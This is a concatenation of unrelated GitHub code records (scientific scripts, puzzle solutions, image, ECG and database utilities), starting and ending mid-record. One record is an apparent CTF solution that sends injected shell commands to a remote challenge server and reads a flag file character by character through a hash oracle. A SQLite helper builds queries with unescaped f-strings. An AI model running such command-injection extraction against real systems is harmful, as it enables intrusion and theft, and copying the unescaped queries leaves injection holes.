open(cmd_args.plink2 + '.eigenvec', 'r') as eigvec2_file:\n reader1 = csv.reader(eigvec1_file, delimiter='\\t')\n reader2 = csv.reader(eigvec2_file, delimiter='\\t')\n next(reader1)\n next(reader2)\n absdiff1_sums = [0.0] * pc_ct\n absdiff2_sums = [0.0] * pc_ct\n avgabs_x2_sums = [0.0] * pc_ct\n for row1 in reader1:\n row2 = next(reader2)\n if row1[0] != row2[0] or row1[1] != row2[1]:\n eprint('Sample ID mismatch between .eigenvec files.')\n sys.exit(1)\n row1pc = row1[2:]\n row2pc = row2[2:]\n for pc_idx in range(pc_ct):\n val1 = float(row1pc[pc_idx])\n val2 = float(row2pc[pc_idx])\n absdiff1_sums[pc_idx] += abs(val2 - val1)\n # all signs may be flipped\n absdiff2_sums[pc_idx] += abs(val2 + val1)\n avgabs_x2_sums[pc_idx] += abs(val2) + abs(val1)\n for pc_idx in range(pc_ct):\n if min(absdiff1_sums[pc_idx], absdiff2_sums[pc_idx]) > tol * avgabs_x2_sums[pc_idx] * 0.5:\n eprint('Eigenvector mismatch.')\n sys.exit(1)\n with open(cmd_args.plink1 + '.eigenvec.var', 'r') as varwt1_file, open(cmd_args.plink2 + '.eigenvec.var', 'r') as varwt2_file:\n reader1 = csv.reader(varwt1_file, delimiter='\\t')\n reader2 = csv.reader(varwt2_file, delimiter='\\t')\n next(reader1)\n next(reader2)\n absdiff1_sums = [0.0] * pc_ct\n absdiff2_sums = [0.0] * pc_ct\n avgabs_x2_sums = [0.0] * pc_ct\n for row1 in reader1:\n row2 = next(reader2)\n if row1[0] != row2[0]:\n eprint('Chromosome mismatch between .eigenvec.var files.')\n sys.exit(1)\n if row1[1] != row2[1]:\n eprint('Variant ID mismatch between .eigenvec.var files.')\n sys.exit(1)\n if not (((row1[2] == row2[2]) and (row1[3] == row2[3])) or\n ((row1[2] == row2[3]) and (row1[3] == row2[2]))):\n eprint('Allele mismatch between .eigenvec.var files.')\n sys.exit(1)\n row1pc = row1[4:]\n row2pc = row2[4:]\n for pc_idx in range(pc_ct):\n val1 = float(row1pc[pc_idx])\n val2 = 
float(row2pc[pc_idx])\n absdiff1_sums[pc_idx] += abs(val2 - val1)\n # all signs may be flipped\n absdiff2_sums[pc_idx] += abs(val2 + val1)\n avgabs_x2_sums[pc_idx] += abs(val2) + abs(val1)\n for pc_idx in range(pc_ct):\n if min(absdiff1_sums[pc_idx], absdiff2_sums[pc_idx]) > tol * avgabs_x2_sums[pc_idx] * 0.5:\n eprint('Variant weight mismatch.')\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"chrchang/plink-ng","sub_path":"2.0/Tests/TEST_PHASED_VCF/pca_compare.py","file_name":"pca_compare.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":366,"dataset":"github-code","pt":"19"} +{"seq_id":"71457547242","text":"import numpy as np\nimport math\nfrom define_functions import*\nfrom input_parameters import*\nlaplacian=1\n\n# time_step=0.1\n# number_measure_points=int(bed_length/(time_step*superficial_velocity))+1 #number of measure points\n# end_time=1\n# space_step=bed_length/number_measure_points\ntime_steps = 100\nnumber_measure_points = 100000\nspace_step = bed_length/number_measure_points # 0.2 mm at 1000 divisions\ntime_step = space_step / superficial_velocity\nprint('time step: ', time_step)\nprint('Length per step: ', space_step)\nprint('Gas velocity: ', superficial_velocity) # 2 mm per s\n\n############### INITIAL CONDITIONS ############################################################ # TODO: Actually for each time t in time steps we want a two dimensional vector in space.\nmoisture_particle = np.zeros(number_measure_points) + moisture_particle_initial\ntemperature_particle = np.zeros(number_measure_points) + temp_initial\nmoisture_gas = np.zeros(number_measure_points) + moisture_gas_initial_in\nmoisture_gas_2 = np.zeros(number_measure_points) + moisture_gas_initial_in \ntemperature_gas = np.zeros(number_measure_points) + temp_initial\n\n############### INITIAL PARAMETERS THAT CHANGE DIRECTLY WITH THE TEMPERATURE ################### # TODO: temperature of the gas? or some mean?\n#moisture_density = np.zeros(number_measure_points)+moisture_density # TODO: for simplifications this will be considered as constant\npressure_saturated = np.zeros(number_measure_points)+pressure_saturated_initial\n\n############### INITIAL PARAMETERS THAT CHANGE INDIRECTLY WITH THE TEMPERATURE #################\nmolar_concentration_moisture = np.zeros(number_measure_points)+molar_concentration_moisture_initial #dep. on moisture_density\nrelative_humidity = np.zeros(number_measure_points) + relative_humidity_gas_inlet #dep. on pressure saturated\npartial_pressure_moisture = np.zeros(number_measure_points)+partial_pressure_moisture_initial #dep. on pressure saturated and RH_gas\n\n################ INITIAL PARAMETERS THAT CHANGE WITH MOISTURE & TEMPERATURE (PARTICLE/GAS)#####\n\nconstant = np.zeros(number_measure_points)+constant_initial #dep. on pressure saturated, k_GP\nk_GP = np.zeros(number_measure_points)+k_GP_initial #dep. 
on molar_concentration_moisture\n\n############### UPDATE OF PARTICLE PARAMETERS THAT THE GAS HAS YET REACHED #####################\nmoisture_difference_y_absorption=np.zeros(number_measure_points)\nmoisture_gradient_gas=np.zeros(number_measure_points)\nprint('moisture particle initial', moisture_particle)\nprint('moisture_gas_initial', moisture_gas)\n\n# position_gas[k]=k*time_step*superficial_velocity = approximately measure point\n#Y_0+change in moisture = Y_1 --> RH_2\nfor t in range(time_steps):\n at_most_bed_length = min(number_measure_points, t+1)\n for i in range(at_most_bed_length):\n\n ###### SAVE OLD PARAMETERS\n m_p_old = moisture_particle[i]\n t_p_old = temperature_particle[i]\n m_G_old = moisture_gas[i]\n t_G_old = temperature_gas[i]\n\n ###### COMPUTE GRADIENTS AND LAPLACIAN\n # moisture_gradient_gas[i] = compute_gradient(moisture_gas, i, space_step) #TODO: here or after updating? I think here.. \n \n ###### UPDATE MOISTURE PARTICLE\n moisture_particle[i]=compute_moisture_particle(m_p_old, alpha_parameter, N, relative_humidity[i], time_step, constant[i], 1)\n\n ###### UPDATE MOISTURE GAS\n moisture_gas[i+1]=compute_moisture_gas(m_p_old, m_G_old, alpha_parameter, N, relative_humidity[i], time_step, constant[i], gas_velocity, moisture_diffusivity, gradient_moisture_initial, laplacian_moisture_initial, gas_density, particle_density, porosity_powder, 1)\n\n ##### UPDATE TEMP PARTICLE\n temperature_particle[i] = compute_temperature_particle(\n t_p_old, constant[i], time_step, conductivity_particle, laplacian_initial, particle_density, alpha_parameter, \n m_p_old, relative_humidity[i], N, heat_of_vaporization, heat_transfer_coefficient_initial, \n specific_surface_area, t_G_old, particle_heat_capacity, 1)\n \n ##### UPDATE TEMP GAS\n temperature_gas[i] = compute_temperature_gas(\n t_p_old, constant[i], time_step, conductivity_gas, laplacian_initial, gas_density, alpha_parameter, m_G_old, N, \n moisture_vapor_heat_capacity, relative_humidity[i], heat_transfer_coefficient_initial, \n specific_surface_area, t_G_old, gas_heat_capacity, superficial_velocity, temp_gradient_initial, porosity_powder, \n particle_density, 1)\n \n ###### UPDATE PARAMETERS \n #moisture_density[i]=moisture_density[i] #for now since we dont know how the vapor density develops with temp\n pressure_saturated[i]=compute_p_saturated(A, B, temperature_gas[i], C)\n\n # molar_concentration_moisture[i]=moisture_density[i] / molar_mass_moisture\n\n partial_pressure_moisture[i]=compute_partial_pressure_moisture(\n molar_concentration_moisture[i], R_gas_constant, temperature_gas[i]) \n\n relative_humidity[i]=compute_relative_humidity_from_Y(molar_mass_dry_air, molar_mass_moisture, pressure_ambient, moisture_gas[i], pressure_saturated[i])\n\n k_GP[i] = compute_mass_transfer_coefficient(\n moisture_diffusivity, gas_viscosity, column_diameter, porosity_powder, gas_density, particle_density, \n flow_rate, particle_diameter, molar_mass_moisture, superficial_velocity, molar_concentration_moisture[i])[3]\n \n constant[i]=k_GP[i] * specific_surface_area * pressure_saturated[i] / pressure_ambient #TODO: doesn't change for now\n\n #if i % 500 == 1:\n #print ('i: ', i)\n #print('temp particle: ', temperature_particle[i], 'temp_gas', temperature_gas[i])\n # print('moisture particle: ', moisture_particle[i])\n # print('moisture gas: ', moisture_gas[i])\n\n # print('t: ', t)\n # print('moisture-gas gradient', (moisture_gas[i]-m_G_old)/space_step)\n\nprint('Change in temp particles:\\n', (temperature_particle - 
temp_initial)[0:5])\nprint('Change in temp gas:\\n', (temperature_gas - temp_initial)[0:5])\n\nprint('Change in moisture particles:\\n', (moisture_particle - moisture_particle_initial)[0:5])\nprint('Change in moisture gas:\\n', (moisture_gas - moisture_gas_initial_in)[0:5])\n\n# def compute_RH(superficial_velocity , moisture_diffusivity, gas_density, particle_density, porosity_powder, k_GP, specific_surface_area, pressure_saturated, pressure_ambient, alpha_parameter, N, moisture_particle_i, current_RH_i, measure_points, space_step, time_step, constant_initial): #current_RH is moisture gas vector TODO: later parameters to compute constant instead of constant initial\n# RH = np.zeros(measure_points)\n# constant=constant_initial # for simplification\n# for i in range(measure_points):\n# diffusion_term=moisture_diffusivity*gas_density*(1-porosity_powder)*compute_laplacian(current_RH, i, space_step)\n# absorption_term=constant*particle_density*porosity_powder/pressure_ambient*(current_RH[i]-compute_equilibrium_moisture(alpha_parameter, moisture_particle[i], N))\n# RH = current_RH[i] + (diffusion_term-absorption_term/(gas_density*(1-porosity_powder)))\n# return RH\n\n################# OLD COMPUTE MOISTURE PARTICLE\n# def compute_moisture_particle(moisture_particle, alpha, N, relative_humidity, dt, constant):\n# change_moisture = constant * (relative_humidity - compute_equilibrium_moisture(alpha, moisture_particle, N))\n# moisture_particle_current = moisture_particle + change_moisture * dt\n# return moisture_particle_current","repo_name":"andreaL14y/Powder-conditioning-column","sub_path":"implicit_version/control_volume_computation_andrea.py","file_name":"control_volume_computation_andrea.py","file_ext":"py","file_size_in_byte":7701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"21789850398","text":"# NOTE: imports added to make this file self-contained; 'Hurst' is assumed to be a helper defined elsewhere in this project.\r\nfrom osgeo import gdal\r\nfrom tqdm import tqdm\r\n\r\n\r\ndef ImageHurst(imgpath, outtif):\r\n \"\"\"\r\n Compute the Hurst exponent of an image\r\n :param imgpath: image path, multi-band\r\n :param outtif: output result path\r\n :return: None\r\n \"\"\"\r\n # Read the image metadata and data\r\n ds1 = gdal.Open(imgpath)\r\n projinfo = ds1.GetProjection()\r\n geotransform = ds1.GetGeoTransform()\r\n rows = ds1.RasterYSize\r\n colmns = ds1.RasterXSize\r\n data1 = ds1.ReadAsArray()\r\n print(data1.shape)\r\n\r\n src_nodta = ds1.GetRasterBand(1).GetNoDataValue()\r\n\r\n # Create the output image\r\n format = \"GTiff\"\r\n driver = gdal.GetDriverByName(format)\r\n dst_ds = driver.Create(outtif, colmns, rows, 1,gdal.GDT_Float32)\r\n dst_ds.SetGeoTransform(geotransform)\r\n dst_ds.SetProjection(projinfo)\r\n\r\n # Release the input dataset\r\n ds1 = None\r\n\r\n # Start computing the exponent\r\n\r\n band1 = data1[0]\r\n out = band1 * 0 - 2222\r\n for row in tqdm(range(rows)):\r\n for col in range(colmns):\r\n if src_nodta is None:\r\n x = data1[:, row, col]\r\n hindex = Hurst(x)\r\n out[row, col] = hindex\r\n else:\r\n if band1[row, col] != src_nodta:\r\n x = data1[:, row, col]\r\n hindex = Hurst(x)\r\n out[row, col] = hindex\r\n # Write out the image\r\n dst_ds.GetRasterBand(1).WriteArray(out)\r\n\r\n # Set nodata\r\n dst_ds.GetRasterBand(1).SetNoDataValue(-2222)\r\n dst_ds = None
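\r\n\r\n# Usage sketch (hypothetical file names, assuming the imports above):\r\n# ImageHurst('ndvi_stack.tif', 'hurst_out.tif')","repo_name":"YCG220509/Python","sub_path":"hurst指数计算/Raster_Hurst.py","file_name":"Raster_Hurst.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8995691147","text":"# -*- coding: utf-8 -*-\n\nfrom unittest import TestCase\n\nfrom nlplib.utils import preprocess_text, sents2wordtag\n\n\nclass TokenizeTokenizeTest(TestCase):\n\n def test_tokenize(self):\n txt = 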
u'''\nBlackfoot, as defined below and described in one or more Service Order Forms executed by Customer and Blackfoot (“Service Orders”).\n'''\n expected_toks = ['Blackfoot', ',', 'as', 'defined', 'below', 'and', 'described', 'in', 'one', 'or', 'more', 'Service', 'Order', 'Forms', 'executed', 'by', 'Customer', 'and', 'Blackfoot', '_LPAR_', '\"', 'Service', 'Orders', '\"', '_RPAR_', '.']\n actual_toks = [tok for tok, tagged in sents2wordtag([preprocess_text(txt)])[0]]\n self.assertEqual(expected_toks, actual_toks)\n","repo_name":"mei-chen/beagle","sub_path":"Dogbone/nlplib/tests/test_tokenize.py","file_name":"test_tokenize.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"72310582444","text":"import cv2\nimport numpy as np\n\nclass EQT_Crop_Converter():\n '''\n Convert a 360 EQT frame to several crops\n '''\n\n def __init__(self):\n self.eqt_w = 3840 # original EQT width\n self.eqt_h = 1920 # original EQT height\n self.slice_count = 4\n self.slice_shift = 0\n \n\n \n def setOriginalEQTSize(self, w, h):\n self.eqt_w = w\n self.eqt_h = h\n # print(f\"set size {w}, {h}\")\n\n def setCountAndShift(self, slice_count = 4, slice_shift = 0):\n self.slice_count = slice_count\n self.slice_shift = slice_shift\n\n\n\n def slice(self, frame, slice_count = 4, slice_shift = 0):\n '''\n Slice an EQT frame into several crops\n\n Input:\n - frame: the original frame.\n - slice_count: how many crops to slice the frame into.\n - slice_shift: the x-index where the first crop starts; the part before this position is concatenated onto the last crop.\n\n Output:\n - crop_outputs: \n '''\n\n # record original EQT size\n self.setOriginalEQTSize(frame.shape[1], frame.shape[0])\n\n slice_width = int(self.eqt_w/slice_count) # width for each slice\n\n if slice_shift > slice_width:\n slice_shift %= slice_width\n \n # record slice info\n self.setCountAndShift(slice_count, slice_shift)\n\n image_y_range = [int(self.eqt_h/4), int(self.eqt_h/4*3)] # only y index in this range has img\n \n\n crop_outputs = []\n\n # slice cubemap\n # crop_img = img[y:y+h, x:x+w]\n for i in range(slice_count):\n x_range = [slice_width*i + slice_shift, slice_width*(i+1) + slice_shift]\n crop_outputs.append(frame[image_y_range[0]:image_y_range[1] , x_range[0]:x_range[1]])\n\n if slice_shift != 0:\n crop_before_shift_position = frame[image_y_range[0]:image_y_range[1], 0:slice_shift]\n crop_outputs[-1] = cv2.hconcat([crop_outputs[-1], crop_before_shift_position])\n\n\n # crop_0 = frame[image_y_range[0]:image_y_range[1] , 0:slice_width]\n # crop_1 = frame[image_y_range[0]:image_y_range[1] , slice_width:slice_width*2]\n # crop_2 = frame[image_y_range[0]:image_y_range[1] , slice_width*2:slice_width*3]\n # crop_3 = frame[image_y_range[0]:image_y_range[1] , slice_width*3:self.eqt_w]\n\n \n # # sequence: left, right\n # crop_outputs = [crop_0, crop_1, crop_2, crop_3]\n\n # save crop images\n for i, crop in enumerate(crop_outputs):\n cv2.imwrite(f'./output/crop-4pic-{i}.jpg', crop)\n\n return crop_outputs\n \n \n
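 # Usage sketch (hypothetical file name; the shift value is an assumption):\n # converter = EQT_Crop_Converter()\n # crops = converter.slice(cv2.imread('eqt_frame.jpg'), slice_count=4, slice_shift=100)\n # restored = converter.assemble(crops)\n\n def assemble(self, crop_frames):\n '''\n reassemble left & right crop to EQT\n '''\n \n # Validation\n if len(crop_frames) != self.slice_count: \n raise ValueError(f\"crop_frames len should be {self.slice_count}, but only get {len(crop_frames)}\")\n\n # chunk part originally is before shift position\n last_crop = crop_frames[-1]\n print(last_crop.shape[1]-self.slice_shift, last_crop.shape[1])\n crop_before_shift_position = last_crop[0:last_crop.shape[0], 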
last_crop.shape[1]-self.slice_shift:last_crop.shape[1]]\n crop_frames[-1] = last_crop[0:last_crop.shape[0], 0:last_crop.shape[1]-self.slice_shift]\n crop_frames.insert(0, crop_before_shift_position)\n\n # assemble crops\n eqt = cv2.hconcat(crop_frames)\n\n # add black border\n blank_image = np.zeros((int(self.eqt_h/4), self.eqt_w, 3), dtype=np.uint8)\n eqt = cv2.vconcat([blank_image, eqt, blank_image])\n\n return eqt","repo_name":"qmsiteandy/360Convert","sub_path":"eqt_crop_converter.py","file_name":"eqt_crop_converter.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21954645181","text":"import sys\nimport time\n\nimport libmproxy\nfrom libmproxy import proxy\nfrom libmproxy.proxy import ProxyServer\nfrom selenium import webdriver\nfrom selenium.webdriver.common.proxy import Proxy, ProxyType\n\nfrom .refererproxy import RefererMaster\n\nproxy_address = '127.0.0.1'\nproxy_port = 8888\n\n\ndef selenium_proxy():\n proxy_url = '{0}:{1}'.format(proxy_address, proxy_port)\n\n p = Proxy({'proxyType': ProxyType.MANUAL,\n 'httpProxy': proxy_url,\n 'ftpProxy': proxy_url,\n 'sslProxy': proxy_url,\n 'noProxy': 'localhost, 127.0.0.1'})\n\n return p\n\n\ndef main(argv=sys.argv[1:]):\n\n referer = 'http://www.nab.com.au/'\n\n port = proxy_port\n config = proxy.ProxyConfig(port=int(port))\n server = ProxyServer(config=config)\n m = RefererMaster(server, referer)\n m.run_async()\n\n driver = webdriver.Firefox(proxy=selenium_proxy())\n driver.get('https://www.nab.com.au/cgi-bin/ib/301_start.pl?browser=correct')\n try:\n print('Loading complete')\n time.sleep(30)\n print('Shutdown proxy server')\n m.shutdown_async()\n finally:\n driver.quit()\n","repo_name":"markjandrews/pypocs","sub_path":"NABYourBalance/nabmyb/nabmyb.py","file_name":"nabmyb.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35259059690","text":"from pykeen.triples import TriplesFactory\r\nfrom pykeen.pipeline import pipeline\r\n\r\ntf = TriplesFactory.from_path('triail.nt')\r\ntraining, testing = tf.split()\r\nresult = pipeline(\r\n training=training,\r\n testing=testing,\r\n model='TransE',\r\n training_kwargs=dict(num_epochs=5), # short epochs for testing - you should go higher\r\n)\r\nresult.save_to_directory('t1')\r\n","repo_name":"Jeffrey-Sardina/cod-trachtais","sub_path":"my_code/nótaí/Sampla/triail.py","file_name":"triail.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32827186629","text":"from typing import List\n\n\ndef is_tree(pattern: List[str], row: int, col: int) -> bool:\n \"\"\"Checks if the input pattern has a tree at the input coordinates.\"\"\"\n width = len(pattern[0]) \n pat_col = col-col//(width-1)*(width-1) # Turn width into an index\n\n if pattern[row][pat_col] == \"#\":\n return True\n return False\n \n\ndef trees_in_route(pattern: List[str], right: int, down: int) -> int:\n \"\"\"Counts the number of trees in the given path.\"\"\"\n trees = 0\n \n for i, row in enumerate(range(0, len(pattern), down)):\n if is_tree(pattern, row, i*right):\n trees += 1\n \n return 
trees\n","repo_name":"gustavwilliam/advent-of-code-2020","sub_path":"solutions/day-3.py","file_name":"day-3.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17962203594","text":"class Solution:\n def containsDuplicate(self, nums: List[int]) -> bool:\n\n counted = set(nums)\n\n return len(nums) != len(counted)\n\n\nclass Solution:\n def containsNearbyDuplicate(self, nums: List[int], k: int) -> bool:\n\n num_dict = {}\n\n for i in range(len(nums)):\n if nums[i] not in num_dict:\n num_dict[nums[i]] = (i,)\n else:\n for j in num_dict[nums[i]]:\n if abs(j - i) <= k:\n return True\n num_dict[nums[i]] += (i,)\n\n return False\n","repo_name":"elisading/leetcode","sub_path":"leetcode/arrays/containsDuplicate.py","file_name":"containsDuplicate.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72714761643","text":"#Packages\nimport sqlite3\nimport re\nimport os\n\nCWD = os.getcwd()\nif r\"\\Project Lip\" not in CWD:\n CWD += r\"/Project Lip\"\nprint(CWD)\nICON_PATH = CWD + r\"/images/notif_icon_test.png\"\n#Establishing connection to database\nglobal_db = CWD + r'/databases/global_vals.db'\ndata_conn = sqlite3.connect(global_db, check_same_thread=False)\ndata_crsr = data_conn.cursor()\n\ndef global_tbl_setup():\n \"\"\"\n This function sets up a database for the global variables to be stored in.\n \"\"\" \n \n generate_global_tbl = f\"\"\"\n CREATE TABLE IF NOT EXISTS global_data (\n attr_name VARCHAR(50),\n val\n );\n \"\"\"\n data_crsr.execute(generate_global_tbl)\n data_conn.commit()\n\ndef get_all_attr_names():\n \"\"\"\n Returns a list containing the name of all attributes currently existing in global_database.\n\n Returns:\n List: a list of Strings for the attributes in global_database.\n \"\"\"\n attr_sql = f'SELECT attr_name FROM global_data'\n data_crsr.execute(attr_sql)\n attr_names = data_crsr.fetchall()\n return [p[0] for p in attr_names]\n\ndef get_global_attr(attr_name):\n \"\"\"\n Get the value of a global attribute whose name is attr_name.\n\n Args:\n attr_name (str): The attribute name whose value needs to be acquired.\n \n Returns:\n Any: the value of that global attribute which the query is made on.\n \"\"\"\n attr_sql = f'SELECT val FROM global_data WHERE attr_name = \"{attr_name}\"'\n data_crsr.execute(attr_sql)\n attr_val = data_crsr.fetchone()\n if attr_val is None:\n return None\n else:\n real_val_repr = attr_val[0]\n if real_val_repr == 'FALSE':\n return False\n elif real_val_repr == 'TRUE':\n return True\n elif type(real_val_repr) is float or type(real_val_repr) is int:\n return real_val_repr\n elif real_val_repr.isdigit():\n return int(real_val_repr)\n else:\n return real_val_repr\n\ndef set_global_attr(attr_name, val):\n \"\"\"\n Sets a global attribute in the database with name attr_name to a value val.\n\n Args:\n attr_name (str): The attribute name whose value is to be set to val.\n val (Any): The new purposed value of the attribute of attr_name.\n \"\"\"\n val = repr(val)\n if get_global_attr(attr_name) is None:\n set_attr_sql = f'INSERT INTO global_data VALUES (\"{attr_name}\", {val})'\n else:\n set_attr_sql = f'''UPDATE global_data \n SET val = {val}\n WHERE attr_name = \"{attr_name}\"\n '''\n data_crsr.execute(set_attr_sql)\n data_conn.commit()\n\ndef transform_msg(selected_line, replace_txt = ('',)):\n \"\"\"\n Transforms a message noted by selected_line 
into a version whose specific\n keywords are converted into the values noted by replace_txt.\n\n Args:\n selected_line (str): The line of message to be transformed\n replace_txt (tuple): A tuple whose contents note the substitute values\n of keywords in selected_line.\n \n Returns:\n str: The transformed version of message.\n \"\"\"\n params = re.findall(r'({[^{}]+})', selected_line)\n for param_pair in zip(params, replace_txt[:len(params)]):\n replacement = get_global_attr(param_pair[0][1:-1])\n selected_line = selected_line.replace(\n param_pair[0], \n replacement or param_pair[1]\n )\n return selected_line\n","repo_name":"Bransthre/project-lip","sub_path":"function_backend/global_database.py","file_name":"global_database.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31413814902","text":"#!/usr/bin/python3\nimport hashlib, string\nfrom pwn import *\n\nd = {}\nfor c in string.printable:\n\tif c == '\\0' or c == '\\r' or c == '\\n':\n\t\tcontinue\n\td[hashlib.sha256((c+\"\\n\").encode()).hexdigest()] = c\n\td[hashlib.sha256((c+2*\"\\n\").encode()).hexdigest()] = c\n\td[hashlib.sha256((c).encode()).hexdigest()] = c\n\n\nflag = \"\"\np = remote(\"ctf.cs.technion.ac.il\", 4014)\np.recv()\ni = 1\nwhile True:\n\tp.sendline(\"cat ./flag.txt | sed -n 1p | cut -c {}\".format(i).encode())\n\ttry:\n\t\tr = p.recv().decode().split(\"\\n\")\n\t\tprint(r)\n\texcept:\n\t\tp = remote(\"ctf.cs.technion.ac.il\", 4014, level='error')\n\t\tp.recv()\n\t\tcontinue\n\tfinally:\n\t\ttry:\n\t\t\tflag += d[r[0]]\n\t\texcept:\n\t\t\tpass #flag += '?'\n\t\tfinally:\n\t\t\ti += 1\n\t\t\tprint(flag)\n","repo_name":"Eladkay/Technion-CTF","sub_path":"script3_bashed.py","file_name":"script3_bashed.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"71737963243","text":"import os\nimport math\nimport glob\nfrom typing import Union\n\nimport numpy as np\nimport pandas as pd\nimport h5py\nimport scipy.optimize\nimport wfdb\nfrom wfdb import processing\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom .util import *\nfrom .data_path import PATH_BASE, DIR_DSET\nfrom .check_args import ca\n\n\ndef plot_1d(arr, label=None, title=None, save=False, s=None, e=None, new_fig=True, plot_kwargs=None, show=True):\n \"\"\" Plot potentially multiple 1D signals \"\"\"\n kwargs = LN_KWARGS\n if plot_kwargs is not None:\n kwargs |= plot_kwargs\n\n if new_fig:\n plt.figure(figsize=(18, 6))\n if not isinstance(arr, list):\n arr = list(arr) if isinstance(arr, np.ndarray) else [arr] # wrap a lone signal in a list\n if not isinstance(label, list):\n label = [label] * len(arr)\n lbl = [None for _ in arr] if label is None else label\n cs = sns.color_palette('husl', n_colors=len(arr))\n\n def _plot(a_, lb_, c_):\n a_ = a_[s:e]\n args = dict(c=c_) | kwargs\n plt.gca().plot(np.arange(a_.size), a_, label=lb_, **args)\n for a, lb, c in zip(arr, lbl, cs):\n _plot(a, lb, c)\n\n if label:\n handles, labels = plt.gca().get_legend_handles_labels() # Distinct labels\n by_label = dict(zip(labels, handles))\n plt.legend(by_label.values(), by_label.keys())\n if title:\n plt.title(title)\n if new_fig:\n save_fig(title, save)\n if show:\n plt.show()\n
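\n# Usage sketch (assumed inputs; plots two traces on one figure):\n# t = np.linspace(0, 4 * np.pi, 400)\n# plot_1d([np.sin(t), np.cos(t)], label=['sin', 'cos'], title='demo', show=False)\n\n\ndef plot_ecg(\n arr: np.ndarray, title: str = None, ax=None, legend: bool = True, gap_factor: float = 1.0,\n save: bool = False, show: bool = True,\n xlabel: str = 'Timestep (potentially resampled)', ylabel: str = 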
'Amplitude, normalized (mV)'\n):\n n_lead = arr.shape[0]\n height = (abs(np.max(arr)) + abs(np.min(arr))) / 4 * gap_factor # Empirical\n\n if ax:\n plt.sca(ax)\n else:\n plt.figure(figsize=(16, 13))\n ax = plt.gca()\n\n ylb_ori = ((np.arange(n_lead) - n_lead + 1) * height)[::-1]\n ylb_new = ['I', 'II', 'III', 'avR', 'avL', 'avF', 'V1', 'V2', 'V3', 'V4', 'V5', 'V6'] # TODO; verify order\n cs = sns.color_palette('husl', n_colors=n_lead)\n for i, row in enumerate(arr):\n offset = height * i\n x = np.arange(row.size)\n y = row - offset\n ax.plot(x, y, label=ylb_new[i], marker='o', ms=0.3, lw=0.25, c=cs[i])\n ax.axhline(y=-offset, lw=0.2)\n\n title = title or 'ECG 12-lead plot'\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.yticks(ylb_ori, ylb_new)\n if legend:\n handles, labels = plt.gca().get_legend_handles_labels() # Distinct labels\n by_label = dict(zip(labels, handles))\n plt.legend(by_label.values(), by_label.keys(), bbox_to_anchor=(1.05, 1))\n if show:\n plt.show()\n save_fig(title, save)\n\n\ndef r2(y, y_fit):\n return 1 - (np.square(y - y_fit).sum() / np.square(y - np.mean(y)).sum())\n\n\ndef fit_power_law(x: np.ndarray, y: np.ndarray, return_fit: Union[int, bool] = False):\n \"\"\"\n :return: 2-tuple of (coefficient, exponent) for power law\n If `return_fit` is True, return additionally 2-tuple of (fitted x, fitted y)\n If integer given, the fitted curve is returned by scale\n \"\"\"\n def pow_law(x_, a, b):\n return a * np.power(x_, b)\n x, y = np.asarray(x).astype(float), np.asarray(y)\n (a_, b_), p_cov = scipy.optimize.curve_fit(f=pow_law, xdata=x, ydata=y, p0=(x[0]*2, -1))\n\n ret = (a_, b_)\n if return_fit:\n scale = 1 if return_fit is True else return_fit\n x_plot = np.linspace(x.min(), x.max(), num=x.size * scale)\n y_fit = pow_law(x_plot, a_, b_)\n ret = ret, (x_plot, y_fit)\n return ret\n\n\ndef plot_resampling(x, y, x_, y_, title=None):\n \"\"\"\n Plots the original signal pair and it's resampled version\n \"\"\"\n plt.figure(figsize=(16, 9))\n plt.plot(x, y, marker='o', ms=4, lw=5, label='Original', alpha=0.5)\n plt.plot(x_, y_, marker='x', ms=4, lw=1, label='Resampled') # ls=(0, (2, 5)),\n if title:\n plt.title(title)\n plt.legend()\n plt.show()\n\n\ndef plot_rpeak(sig, idx_rpeak, title=None):\n x = np.arange(sig.size)\n\n plt.figure(figsize=(16, 9))\n plt.plot(x, sig, marker='o', ms=0.3, lw=0.25, label='Original', alpha=0.5)\n\n for i in idx_rpeak:\n plt.axvline(x=i, c='r', lw=0.5, label='R peak')\n\n t = 'ECG R-peaks'\n if title:\n t = f'{t}, {title}'\n plt.title(t)\n handles, labels = plt.gca().get_legend_handles_labels() # Distinct labels\n by_label = dict(zip(labels, handles))\n plt.legend(by_label.values(), by_label.keys())\n plt.show()\n\n\ndef refine_rpeak(sig, idxs_peak, fqs, r_wd=100):\n \"\"\"\n :param sig: 1D ECG signal\n :param idxs_peak: Indices of tentative R peaks\n :param fqs: Sample frequency\n :param r_wd: Half range in ms to look for optimal R peak\n :return: Refined R peak indices\n \"\"\"\n return processing.correct_peaks(\n sig, idxs_peak,\n search_radius=math.ceil(fqs * r_wd / 1e3),\n smooth_window_size=2, # TODO: what's this?\n peak_dir='up'\n )\n\n\ndef get_processed_path():\n \"\"\"\n Path where the processed records are stored\n \"\"\"\n return os.path.join(PATH_BASE, DIR_DSET, config('datasets.my.dir_nm'))\n\n\ndef get_my_rec_labels():\n d_my = config(f'{DIR_DSET}.my')\n recs_csv_fnm = os.path.join(PATH_BASE, 